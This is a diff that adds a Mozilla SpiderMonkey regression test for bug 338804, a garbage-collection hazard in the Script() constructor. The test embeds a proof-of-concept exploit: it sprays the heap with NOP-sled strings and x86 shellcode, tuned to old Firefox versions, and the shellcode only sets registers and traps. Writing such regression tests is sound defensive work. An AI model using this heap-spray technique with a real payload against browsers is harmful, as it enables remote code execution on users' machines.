1.1 --- /dev/null Thu Jan 01 00:00:00 1970 +0000
1.2 +++ b/js/src/tests/js1_5/extensions/regress-338804-01.js Wed Dec 31 06:09:35 2014 +0100
1.3 @@ -0,0 +1,69 @@
1.4 +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
1.5 +/* This Source Code Form is subject to the terms of the Mozilla Public
1.6 + * License, v. 2.0. If a copy of the MPL was not distributed with this
1.7 + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */
1.8 +
1.9 +//-----------------------------------------------------------------------------
1.10 +var BUGNUMBER = 338804;
1.11 +var summary = 'GC hazards in constructor functions';
1.12 +var actual = 'No Crash';
1.13 +var expect = 'No Crash';
1.14 +
1.15 +printBugNumber(BUGNUMBER);
1.16 +printStatus (summary);
1.17 +printStatus ('Uses Intel Assembly');
1.18 +
1.19 +// <script>
1.20 +// SpiderMonkey Script() GC hazard exploit
1.21 +//
1.22 +// scale: magic number ;-)
1.23 +// BonEcho/2.0a2: 3000
1.24 +// Firefox/1.5.0.4: 2000
1.25 +//
1.26 +var rooter, scale = 3000;
1.27 +
1.28 +/*
1.29 + if(typeof(setTimeout) != "undefined") {
1.30 + setTimeout(exploit, 2000);
1.31 + } else {
1.32 + exploit();
1.33 + }
1.34 +*/
1.35 +
1.36 +function exploit() {
1.37 + if (typeof Script == 'undefined')
1.38 + {
1.39 + print('Test skipped. Script not defined.');
1.40 + }
1.41 + else
1.42 + {
1.43 + Script({ toString: fillHeap });
1.44 + Script({ toString: fillHeap });
1.45 + }
1.46 +}
1.47 +
1.48 +function createPayload() {
1.49 + var result = "\u9090", i;
1.50 + for(i = 0; i < 9; i++) {
1.51 + result += result;
1.52 + }
1.53 + /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
1.54 + result += "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
1.55 + return result;
1.56 +}
1.57 +
1.58 +function fillHeap() {
1.59 + rooter = [];
1.60 + var payload = createPayload(), block = "", s2 = scale * 2, i;
1.61 + for(i = 0; i < scale; i++) {
1.62 + rooter[i] = block = block + payload;
1.63 + }
1.64 + for(; i < s2; i++) {
1.65 + rooter[i] = payload + i;
1.66 + }
1.67 + return "";
1.68 +}
1.69 +
1.70 +// </script>
1.71 +
1.72 +reportCompare(expect, actual, summary);
